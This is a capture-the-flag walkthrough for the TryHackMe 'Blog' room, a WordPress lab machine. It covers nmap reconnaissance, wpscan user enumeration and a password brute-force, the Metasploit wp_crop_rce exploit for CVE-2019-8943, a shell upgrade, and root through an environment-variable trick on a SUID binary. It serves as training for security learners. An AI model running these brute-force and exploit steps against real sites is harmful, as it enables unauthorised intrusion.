Basic information

Room name: Blog Description: Billy Joel made a WordPress blog!

Difficulty: Medium Room link: tryhackme.com/room/blog

Step 1 - Reconnaissance

Don't forget to add blog.thm to your /etc/hosts file!

Let's start off with a simple nmap scan.

~# nmap -sV -p- -T5 blog.thm

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Seems like we have an SSH, HTTP,and 2 SMB ports open. Since it's a WordPress exploitation room, we can confidently skip Samba enumeration. (Note: This is not applicable to other rooms. This was intended to skip since all SMB ports here are just rabbit holes)

Let's browse to the HTTP Port and enumerate there.

Step 2 - WordPress Enumeration

As usual, we need to start with user enumeration.

wpscan --url blog.thm -e u

# --url = specify url
# -e = enumerate users (u)

After a quick scan we get exactly 2 valid usernames.

Note here: Even though Wpscan was able to identify 4 users, only 2 of them appear to be nicknames with some basic information and API reference.

Step 3 - WordPress Bruteforce

Now, as we have 2 valid usernames, we can start a simple wp-login bruteforce. Use the command below and give it about 2-3 minutes. After that stop it by pressing Ctrl+C and you'll be good to go.

wpscan --url blog.thm -U bjoel,kwheel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64

Step 4 - User

Now, as we have some valid credentials, we can log in to the account. After a quick enumeration, we discover that the website is using WordPress version 5. A small research led me to CVE-2019-8943. It includes a path traversal and a local file inclusion vulnerability. Happily for us, a given vulnerability has a Metasploit module.

exploit/multi/http/wp_crop_rce

Read more: rapid7.com/db/modules/exploit/multi/http/wp_crop_rce

Let's use our retrieved credentials to run the exploit. Your settings should look like so:

For ease of usage, run shell command and upgrade to a tty shell using:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 5 - Privilege escalation

Both user and root txt files are going to be available after getting root.

Let's look at the SUID files and find a possible privilege escalation vector. Run a simple SUID search using:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

The one that really stands out is /usr/sbin/checker. It's not a usual binary and it has stand-alone permissions.

Read more about SUID: blog.tryhackme.com/linux-privilege-escalation-suid/

Download the executable using meterpreter's download function and put it to a decompiling tool (GHydra or Cutter). The main function looks like that:

This single function check if environment variable (getenv) admin is equal to 0 (null). Meaning that making it anything esle should give us root!

export admin=abc
./checker

Bingo! We got root. Now go find the user.txt file using a following command:

find / -name "user.txt" 2>/dev/null

That's all! Thanks for reading :)